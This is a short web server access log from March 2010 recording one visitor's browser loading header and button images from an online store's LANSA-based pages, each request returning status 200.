98.119.149.73 - - [19/Mar/2010:01:00:05 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:00:05 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:00:05 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:00:05 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:00:05 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:00:05 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:00:05 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:00:05 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:00:05 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
98.119.149.73 - - [19/Mar/2010:01:00:05 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5"
